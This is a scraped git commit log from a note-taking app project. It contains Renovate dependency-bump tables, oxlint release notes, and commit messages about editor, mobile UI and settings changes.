| [@types/node](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/master/types/node ) ([source](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/HEAD/types/node )) | [`20.16.1` -> `20.16.3`](https://renovatebot.com/diffs/npm/@types%2fnode/20.16.1/20.16.3 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@types/react](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/master/types/react ) ([source](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/HEAD/types/react )) | [`18.3.4` -> `18.3.5`](https://renovatebot.com/diffs/npm/@types%2freact/18.3.4/18.3.5 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [changelogithub](https://redirect.github.com/antfu/changelogithub ) | [`0.13.9` -> `0.13.10`](https://renovatebot.com/diffs/npm/changelogithub/0.13.9/0.13.10 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [commitlint](https://commitlint.js.org/ ) ([source](https://redirect.github.com/conventional-changelog/commitlint/tree/HEAD/@alias/commitlint )) | [`19.4.0` -> `19.4.1`](https://renovatebot.com/diffs/npm/commitlint/19.4.0/19.4.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [fast-xml-parser](https://redirect.github.com/NaturalIntelligence/fast-xml-parser ) | [`4.4.1` -> `4.5.0`](https://renovatebot.com/diffs/npm/fast-xml-parser/4.4.1/4.5.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [happy-dom](https://redirect.github.com/capricorn86/happy-dom ) | [`15.0.0` -> `15.7.3`](https://renovatebot.com/diffs/npm/happy-dom/15.0.0/15.7.3 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [http-proxy-middleware](https://redirect.github.com/chimurai/http-proxy-middleware ) | [`3.0.0` -> `3.0.1`](https://renovatebot.com/diffs/npm/http-proxy-middleware/3.0.0/3.0.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [jotai-effect](https://redirect.github.com/jotaijs/jotai-effect ) | [`1.0.2` -> `1.0.3`](https://renovatebot.com/diffs/npm/jotai-effect/1.0.2/1.0.3 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [lint-staged](https://redirect.github.com/lint-staged/lint-staged ) | [`15.2.9` -> `15.2.10`](https://renovatebot.com/diffs/npm/lint-staged/15.2.9/15.2.10 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [lucide-react](https://lucide.dev ) ([source](https://redirect.github.com/lucide-icons/lucide/tree/HEAD/packages/lucide-react )) | [`^0.435.0` -> `^0.438.0`](https://renovatebot.com/diffs/npm/lucide-react/0.435.0/0.438.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [marked](https://marked.js.org ) ([source](https://redirect.github.com/markedjs/marked )) | [`14.0.0` -> `14.1.0`](https://renovatebot.com/diffs/npm/marked/14.0.0/14.1.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [mixpanel-browser](https://redirect.github.com/mixpanel/mixpanel-js ) | [`2.55.0` -> `2.55.1`](https://renovatebot.com/diffs/npm/mixpanel-browser/2.55.0/2.55.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [msw](https://mswjs.io ) ([source](https://redirect.github.com/mswjs/msw )) | [`2.3.5` -> `2.4.1`](https://renovatebot.com/diffs/npm/msw/2.3.5/2.4.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [nestjs-throttler-storage-redis](https://redirect.github.com/kkoomen/nestjs-throttler-storage-redis ) | [`0.5.0` -> `0.5.1`](https://renovatebot.com/diffs/npm/nestjs-throttler-storage-redis/0.5.0/0.5.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [nx](https://nx.dev ) ([source](https://redirect.github.com/nrwl/nx/tree/HEAD/packages/nx )) | [`19.6.2` -> `19.6.4`](https://renovatebot.com/diffs/npm/nx/19.6.2/19.6.4 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [openai](https://redirect.github.com/openai/openai-node ) | [`4.56.0` -> `4.57.0`](https://renovatebot.com/diffs/npm/openai/4.56.0/4.57.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [postcss](https://postcss.org/ ) ([source](https://redirect.github.com/postcss/postcss )) | [`8.4.41` -> `8.4.44`](https://renovatebot.com/diffs/npm/postcss/8.4.41/8.4.44 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [prisma](https://www.prisma.io ) ([source](https://redirect.github.com/prisma/prisma/tree/HEAD/packages/cli )) | [`5.18.0` -> `5.19.1`](https://renovatebot.com/diffs/npm/prisma/5.18.0/5.19.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [react-hook-form](https://www.react-hook-form.com ) ([source](https://redirect.github.com/react-hook-form/react-hook-form )) | [`7.52.2` -> `7.53.0`](https://renovatebot.com/diffs/npm/react-hook-form/7.52.2/7.53.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [react-resizable-panels](https://redirect.github.com/bvaughn/react-resizable-panels ) | [`2.1.1` -> `2.1.2`](https://renovatebot.com/diffs/npm/react-resizable-panels/2.1.1/2.1.2 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [react-virtuoso](https://virtuoso.dev/ ) ([source](https://redirect.github.com/petyosi/react-virtuoso )) | [`4.10.1` -> `4.10.2`](https://renovatebot.com/diffs/npm/react-virtuoso/4.10.1/4.10.2 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [serde](https://serde.rs ) ([source](https://redirect.github.com/serde-rs/serde )) | `1.0.208` -> `1.0.209` | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | workspace.dependencies | patch |
| [serde_json](https://redirect.github.com/serde-rs/json ) | `1.0.125` -> `1.0.127` | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | workspace.dependencies | patch |
| [ses](https://redirect.github.com/Agoric/SES-shim/tree/master/packages/ses#readme ) ([source](https://redirect.github.com/endojs/endo/tree/HEAD/packages/ses )) | [`1.7.0` -> `1.8.0`](https://renovatebot.com/diffs/npm/ses/1.7.0/1.8.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [shadcn-ui](https://redirect.github.com/shadcn/ui ) ([source](https://redirect.github.com/shadcn/ui/tree/HEAD/packages/cli )) | [`^0.8.0` -> `^0.9.0`](https://renovatebot.com/diffs/npm/shadcn-ui/0.8.0/0.9.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [slackapi/slack-github-action](https://redirect.github.com/slackapi/slack-github-action ) | `v1.26.0` -> `v1.27.0` | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | action | minor |
| [storybook-dark-mode](https://redirect.github.com/hipstersmoothie/storybook-dark-mode ) | [`4.0.1` -> `4.0.2`](https://renovatebot.com/diffs/npm/storybook-dark-mode/4.0.1/4.0.2 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [stripe](https://redirect.github.com/stripe/stripe-node ) | [`16.8.0` -> `16.9.0`](https://renovatebot.com/diffs/npm/stripe/16.8.0/16.9.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [tokio](https://tokio.rs ) ([source](https://redirect.github.com/tokio-rs/tokio )) | `1.39.3` -> `1.40.0` | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dev-dependencies | minor |
| [tokio](https://tokio.rs ) ([source](https://redirect.github.com/tokio-rs/tokio )) | `1.39.3` -> `1.40.0` | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | workspace.dependencies | minor |
| [vite-plugin-dts](https://redirect.github.com/qmhc/vite-plugin-dts ) | [`4.0.3` -> `4.1.0`](https://renovatebot.com/diffs/npm/vite-plugin-dts/4.0.3/4.1.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [vitest-mock-extended](https://redirect.github.com/eratio08/vitest-mock-extended ) | [`2.0.0` -> `2.0.2`](https://renovatebot.com/diffs/npm/vitest-mock-extended/2.0.0/2.0.2 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [wrangler](https://redirect.github.com/cloudflare/workers-sdk ) ([source](https://redirect.github.com/cloudflare/workers-sdk/tree/HEAD/packages/wrangler )) | [`3.72.2` -> `3.73.0`](https://renovatebot.com/diffs/npm/wrangler/3.72.2/3.73.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [yarn](https://redirect.github.com/yarnpkg/berry ) ([source](https://redirect.github.com/yarnpkg/berry/tree/HEAD/packages/yarnpkg-cli )) | [`4.4.0` -> `4.4.1`](https://renovatebot.com/diffs/npm/yarn/4.4.0/4.4.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | packageManager | patch |
---
### Release Notes
<details>
<summary>chromaui/addon-visual-tests (@​chromatic-com/storybook)</summary>
### [`v1.8.0`](https://redirect.github.com/chromaui/addon-visual-tests/blob/HEAD/CHANGELOG.md#v180-Thu-Aug-29-2024 )
[Compare Source](https://redirect.github.com/chromaui/addon-visual-tests/compare/v1.7.0...v1.8.0 )
##### 🚀 Enhancement
- Add `paramKey: "chromatic"` to allow disabling the VTA panel through story parameters [#​334](https://redirect.github.com/chromaui/addon-visual-tests/pull/334 ) ([@​mellm0](https://redirect.github.com/mellm0 ))
##### Authors: 1
- Mell (
2024-09-03 06:55:34 +00:00
EYHN
a6484018ef
refactor(core): refactor editor query string selector ( #8058 )
...
The editor selector is the information for locating a block, which can automatically focus on a certain content when a user opens a document.
```
export type EditorSelector = {
blockIds?: string[];
elementIds?: string[];
};
```
The selector can be set from multiple places, such as passing it in the center peek parameter, or passing it in the query part of the URL.
This pr decoupled the selector from the query string and now available at `editorService.editor.selector$`
2024-09-03 06:37:58 +00:00
fundon
f9d0a348c4
feat(core): add custom configuration to database options ( #7933 )
...
Upstreams: https://github.com/toeverything/blocksuite/pull/8022
* add custom configuration to database options
* add `Copy link to block` button to database options
<img width="518" alt="Screenshot 2024-09-03 at 08 57 59" src="https://github.com/user-attachments/assets/a421cd82-abd4-456e-af17-c4db6c4ff3ae ">
2024-09-03 03:52:10 +00:00
fundon
c3ae219992
feat(core): add block and element toolbar widget custom config ( #7886 )
...
Upstreams: https://github.com/toeverything/blocksuite/pull/8001 https://github.com/toeverything/blocksuite/pull/7964
* add block/element toolbar widget config
* add `Copy link to block` to `more menu` on block/element toolbar
<img width="376" alt="Screenshot 2024-08-16 at 16 20 08" src="https://github.com/user-attachments/assets/49b41de9-39d1-4f55-ac9b-445fe020187a ">
2024-09-03 03:52:08 +00:00
CatsJuice
ad110078ac
feat(mobile): setting page ui ( #8048 )
...
AF-1275
2024-09-03 03:27:18 +00:00
JimmFly
bea3d42f40
feat(core): add color picker ui to editor settings ( #8053 )
...
close AF-1306 AF-1280

2024-09-03 03:14:50 +00:00
EYHN
02f0d7aa08
feat(component): dropdown menu auto avoid collisions ( #8013 )
...
<div class='graphite__hidden'>
<div>🎥 Video uploaded on Graphite:</div>
<a href="https://app.graphite.dev/media/video/g3jz87HxbjOJpXV3FPT7/7f9d21cc-7b2f-4dc1-801c-e69d5e6d0750.mp4 ">
<img src="https://app.graphite.dev/api/v1/graphite/video/thumbnail/g3jz87HxbjOJpXV3FPT7/7f9d21cc-7b2f-4dc1-801c-e69d5e6d0750.mp4 ">
</a>
</div>
<video src="https://graphite-user-uploaded-assets-prod.s3.amazonaws.com/g3jz87HxbjOJpXV3FPT7/7f9d21cc-7b2f-4dc1-801c-e69d5e6d0750.mp4 ">CleanShot 2024-08-29 at 14.49.58.mp4</video>
2024-09-03 02:12:16 +00:00
pengx17
197996de31
fix(mobile): handle menu ref better ( #8051 )
2024-09-03 01:59:45 +00:00
L-Sun
392fef663e
chore: bump blocksuite ( #8052 )
...
## Features
- https://github.com/toeverything/BlockSuite/pull/8115 @EYHN
## Bugfix
- https://github.com/toeverything/BlockSuite/pull/8119 @L-Sun
- https://github.com/toeverything/BlockSuite/pull/8117 @zzj3720
- https://github.com/toeverything/BlockSuite/pull/8114 @donteatfriedrice
## Misc
- https://github.com/toeverything/BlockSuite/pull/8106 @fundon
- https://github.com/toeverything/BlockSuite/pull/8116 @doodlewind
2024-09-02 15:25:26 +00:00
JimmFly
130e6ab4a3
chore: adjust custom font family style ( #8040 )
...
close AF-1302 AF-1301
2024-09-02 15:11:58 +00:00
akumatus
2e37ee0e33
feat(core): add actions to editor settings ( #8030 )
...
# What Changed?
- Add actions of following edgeless-elements editor settings:
- note
- connector
- edgeless text
- pen
2024-09-02 14:23:04 +00:00
pengx17
e1310b65cd
fix(mobile): change how slider height is calculated ( #8049 )
2024-09-02 14:10:37 +00:00
Brooooooklyn
87da792c4c
ci: deploy the mobile entry ( #8028 )
2024-09-02 12:59:41 +00:00
Saul-Mirone
56f4634c1f
chore: bump bs with new extension api ( #8042 )
2024-09-02 10:32:22 +00:00
pengx17
61e37d8873
test(mobile): basic e2e tests ( #8031 )
...
fix AF-1289
1. tested on 'webkit'
2. a few baseline test cases
2024-09-02 10:20:24 +00:00
Brooooooklyn
41d35fdafd
ci: skip generating changelog if prev commit is not found ( #8045 )
2024-09-02 10:08:16 +00:00
JimmFly
a992376053
chore: modify the text content of share menu ( #8026 )
...


2024-09-02 09:56:17 +00:00
darkskygit
d93d39e29d
feat: add editor record ( #7938 )
...
fix CLOUD-58, CLOUD-61, CLOUD-62, PD-1607, PD-1608
2024-09-02 09:37:39 +00:00
forehalo
d9cedf89e1
fix(electron): app updater ( #8043 )
2024-09-02 07:53:17 +00:00
JimmFly
a802dc4fd6
chore: adjust experimental features text ( #8044 )
...
close AF-1313 AF-1312 AF-1311 AF-1310
2024-09-02 07:40:55 +00:00
pengx17
4caf32629a
fix(core): slider thumb offset ( #8041 )
...
fix AF-1307
2024-09-02 07:19:16 +00:00
pengx17
697f2c6520
fix(core): remove modal default overlay onclick ( #8035 )
...
fix AF-1300
overlay click is already handled in `handlePointerDownOutSide`. adding onclick to overlay will cause issues on closing nested menus.
2024-09-02 02:59:18 +00:00
pengx17
df34e2cdf7
fix(mobile): close menu when detail page navigate away ( #8027 )
2024-08-31 04:42:32 +00:00
renovate
592997b65b
chore: bump up oxlint version to v0.9.1 ( #7974 )
...
This PR contains the following updates:
| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [oxlint](https://oxc.rs ) ([source](https://togithub.com/oxc-project/oxc/tree/HEAD/npm/oxlint )) | [`0.8.0` -> `0.9.1`](https://renovatebot.com/diffs/npm/oxlint/0.8.0/0.9.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
---
### Release Notes
<details>
<summary>oxc-project/oxc (oxlint)</summary>
### [`v0.9.1`](https://togithub.com/oxc-project/oxc/releases/tag/oxlint_v0.9.1 ): oxlint v0.9.1
[Compare Source](https://togithub.com/oxc-project/oxc/compare/oxlint_v0.9.0...oxlint_v0.9.1 )
#### \[0.9.1] - 2024-08-29
##### Features
- [`6633972`](https://togithub.com/oxc-project/oxc/commit/6633972 ) linter: Add fixer for `no-empty` ([#​5276](https://togithub.com/oxc-project/oxc/issues/5276 )) (camc314)
- [`a58e448`](https://togithub.com/oxc-project/oxc/commit/a58e448 ) linter/eslint: Add fixer to `no-var` ([#​5144](https://togithub.com/oxc-project/oxc/issues/5144 )) (camc314)
- [`a6e9769`](https://togithub.com/oxc-project/oxc/commit/a6e9769 ) linter/jsx-a11y: Add `label-has-associated-control` ([#​5163](https://togithub.com/oxc-project/oxc/issues/5163 )) (Billy Levin)
- [`c8e8532`](https://togithub.com/oxc-project/oxc/commit/c8e8532 ) linter/unicorn: Add fixer to `throw-new-error` ([#​5275](https://togithub.com/oxc-project/oxc/issues/5275 )) (camc314)
- [`7ccde4b`](https://togithub.com/oxc-project/oxc/commit/7ccde4b ) linter/unicorn: Add fixer to `prefer-date-now` ([#​5147](https://togithub.com/oxc-project/oxc/issues/5147 )) (camc314)
##### Bug Fixes
- [`fdef8ae`](https://togithub.com/oxc-project/oxc/commit/fdef8ae ) linter: Jest/vitest rule compat ([#​4797](https://togithub.com/oxc-project/oxc/issues/4797 )) (cinchen)
- [`76e86f8`](https://togithub.com/oxc-project/oxc/commit/76e86f8 ) linter: Eslint-plugin-unicorn prefer-spread wrong linter suggestion on variables of type string ([#​5265](https://togithub.com/oxc-project/oxc/issues/5265 )) (Arian94)
- [`b39544e`](https://togithub.com/oxc-project/oxc/commit/b39544e ) linter/jest: Fixer for `prefer-jest-mocked` creates invalid LHS expressions ([#​5243](https://togithub.com/oxc-project/oxc/issues/5243 )) (camc314)
- [`9953fa5`](https://togithub.com/oxc-project/oxc/commit/9953fa5 ) linter/no-null: Incorrect fixer for `NullLiteral` within `ReturnStatement` ([#​5247](https://togithub.com/oxc-project/oxc/issues/5247 )) (Dunqing)
- [`318479e`](https://togithub.com/oxc-project/oxc/commit/318479e ) linter/no-unused-vars: Mark the class/function in the new expression as used ([#​5306](https://togithub.com/oxc-project/oxc/issues/5306 )) (magic-akari)
##### Refactor
- [`fa1d460`](https://togithub.com/oxc-project/oxc/commit/fa1d460 ) linter: Clean up Fixer and Message ([#​5308](https://togithub.com/oxc-project/oxc/issues/5308 )) (DonIsaac)
### [`v0.9.0`](https://togithub.com/oxc-project/oxc/releases/tag/oxlint_v0.9.0 ): oxlint v0.9.0
[Compare Source](https://togithub.com/oxc-project/oxc/compare/oxlint_v0.8.0...oxlint_v0.9.0 )
#### \[0.9.0] - 2024-08-26
This release introduces `no-unused-vars` as a `correctness` rule and parsing regular expressions for syntax errors, both may produce false positives. Feel free to submit an issue.
- [`5946748`](https://togithub.com/oxc-project/oxc/commit/5946748 ) linter: \[**BREAKING**] Parse and display syntax errors for regular expressions ([#​5214](https://togithub.com/oxc-project/oxc/issues/5214 )) (Boshen)

- [`b894d3b`](https://togithub.com/oxc-project/oxc/commit/b894d3b ) linter: \[**BREAKING**] Make `no-unused-vars` correctness ([#​5081](https://togithub.com/oxc-project/oxc/issues/5081 )) (DonIsaac)
##### Features
- [`1ce9630`](https://togithub.com/oxc-project/oxc/commit/1ce9630 ) linter/config: Implement FromIterator for LintPluginOptions ([#​5102](https://togithub.com/oxc-project/oxc/issues/5102 )) (DonIsaac)
- [`34bfaf6`](https://togithub.com/oxc-project/oxc/commit/34bfaf6 ) linter/react: Add fixer to `jsx-props-no-spread-multi` ([#​5145](https://togithub.com/oxc-project/oxc/issues/5145 )) (camc314)
- [`982bd6e`](https://togithub.com/oxc-project/oxc/commit/982bd6e ) linter/unicorn: Add fixer to `require-array-join-separator` ([#​5152](https://togithub.com/oxc-project/oxc/issues/5152 )) (camc314)
- [`a6704bd`](https://togithub.com/oxc-project/oxc/commit/a6704bd ) linter/unicorn: Add fixer to `prefer-set-size` ([#​5149](https://togithub.com/oxc-project/oxc/issues/5149 )) (camc314)
- [`ac7edcc`](https://togithub.com/oxc-project/oxc/commit/ac7edcc ) linter/unicorn: Add fixer to `prefer-array-some` ([#​5153](https://togithub.com/oxc-project/oxc/issues/5153 )) (camc314)
- [`1d01aa3`](https://togithub.com/oxc-project/oxc/commit/1d01aa3 ) linter/unicorn: Add partial fixer for `prefer-array-flat` ([#​5143](https://togithub.com/oxc-project/oxc/issues/5143 )) (camc314)
- [`22d57f9`](https://togithub.com/oxc-project/oxc/commit/22d57f9 ) linter/unicorn: Add fixer to `prefer-string-slice` ([#​5150](https://togithub.com/oxc-project/oxc/issues/5150 )) (Cameron)
- [`2fe4415`](https://togithub.com/oxc-project/oxc/commit/2fe4415 ) linter/unicorn: Add fixer to `no-redundant-roles` ([#​5146](https://togithub.com/oxc-project/oxc/issues/5146 )) (Cameron)
- [`d35c6f5`](https://togithub.com/oxc-project/oxc/commit/d35c6f5 ) linter/unicorn: Add fixer to `prefer-regexp-test` ([#​5151](https://togithub.com/oxc-project/oxc/issues/5151 )) (Cameron)
- [`27db769`](https://togithub.com/oxc-project/oxc/commit/27db769 ) linter/unicorn: Add fixer to `text-encoding-identifier-case` ([#​5154](https://togithub.com/oxc-project/oxc/issues/5154 )) (Cameron)
- [`f7958c4`](https://togithub.com/oxc-project/oxc/commit/f7958c4 ) linter/unicorn: Add prefer-structured-clone ([#​5095](https://togithub.com/oxc-project/oxc/issues/5095 )) (Jelle van der Waa)
- [`004ffa0`](https://togithub.com/oxc-project/oxc/commit/004ffa0 ) linter/vitest: Implement `prefer-each` ([#​5203](https://togithub.com/oxc-project/oxc/issues/5203 )) (dalaoshu)
##### Bug Fixes
- [`aaaf26c`](https://togithub.com/oxc-project/oxc/commit/aaaf26c ) linter: Error in fixer for prefer-to-have-length ([#​5197](https://togithub.com/oxc-project/oxc/issues/5197 )) (dalaoshu)
- [`1f5b6b6`](https://togithub.com/oxc-project/oxc/commit/1f5b6b6 ) linter: Bug in fixer for prefer-to-have-length ([#​5164](https://togithub.com/oxc-project/oxc/issues/5164 )) (dalaoshu)
- [`7eb052e`](https://togithub.com/oxc-project/oxc/commit/7eb052e ) linter: `no-hex-escape` fixer removing regex flags ([#​5137](https://togithub.com/oxc-project/oxc/issues/5137 )) (Cameron)
- [`76c66b4`](https://togithub.com/oxc-project/oxc/commit/76c66b4 ) linter/max-lines: Point span to end of file for disable directive to work ([#​5117](https://togithub.com/oxc-project/oxc/issues/5117 )) (Boshen)
- [`8ff6f2c`](https://togithub.com/oxc-project/oxc/commit/8ff6f2c ) linter/no-unused-vars: Panic on UsingDeclarations ([#​5206](https://togithub.com/oxc-project/oxc/issues/5206 )) (DonIsaac)
- [`d29042e`](https://togithub.com/oxc-project/oxc/commit/d29042e ) linter/no-unused-vars: Function expression in implicit arrow function return ([#​5155](https://togithub.com/oxc-project/oxc/issues/5155 )) (DonIsaac)
- [`36e4a28`](https://togithub.com/oxc-project/oxc/commit/36e4a28 ) linter/no-unused-vars: Panic in variable declarator usage checks ([#​5160](https://togithub.com/oxc-project/oxc/issues/5160 )) (DonIsaac)
- [`ba62a71`](https://togithub.com/oxc-project/oxc/commit/ba62a71 ) linter/react: Fixed false positive with missing key inside React.Children.toArray() for fragments ([#​5133](https://togithub.com/oxc-project/oxc/issues/5133 )) (Earl Chase)
- [`fd1031a`](https://togithub.com/oxc-project/oxc/commit/fd1031a ) linter/unicorn: Breaking fixer in case statements for `no-null` ([#​5176](https://togithub.com/oxc-project/oxc/issues/5176 )) (DonIsaac)
- [`7b86ed6`](https://togithub.com/oxc-project/oxc/commit/7b86ed6 ) linter/unicorn: Handle type casts and parens in `no-null` ([#​5175](https://togithub.com/oxc-project/oxc/issues/5175 )) (Don Isaac)
- [`b629e16`](https://togithub.com/oxc-project/oxc/commit/b629e16 ) linter/unicorn: Improve diagnostic message for `no-null` ([#​5172](https://togithub.com/oxc-project/oxc/issues/5172 )) (DonIsaac)
##### Performance
- [`ce454cf`](https://togithub.com/oxc-project/oxc/commit/ce454cf ) Use simdutf8 to validate UTF-8 when reading files ([#​5196](https://togithub.com/oxc-project/oxc/issues/5196 )) (dalaoshu)
##### Refactor
- [`543cad6`](https://togithub.com/oxc-project/oxc/commit/543cad6 ) codegen: Remove some pub APIs (Boshen)
- [`0d3661a`](https://togithub.com/oxc-project/oxc/commit/0d3661a ) linter: Remove meaningless `span0` ([#​5209](https://togithub.com/oxc-project/oxc/issues/5209 )) (dalaoshu)
- [`2a91ef1`](https://togithub.com/oxc-project/oxc/commit/2a91ef1 ) linter: `eslint/no_redeclare` rule use `run_on_symbol` not `run_once` ([#​5201](https://togithub.com/oxc-project/oxc/issues/5201 )) (overlookmotel)
- [`33599b0`](https://togithub.com/oxc-project/oxc/commit/33599b0 ) linter: Split options into multiple files ([#​5101](https://togithub.com/oxc-project/oxc/issues/5101 )) (DonIsaac)
- [`7ab6152`](https://togithub.com/oxc-project/oxc/commit/7ab6152 ) linter/unicorn: Clean up `no-null` ([#​5174](https://togithub.com/oxc-project/oxc/issues/5174 )) (DonIsaac)
##### Testing
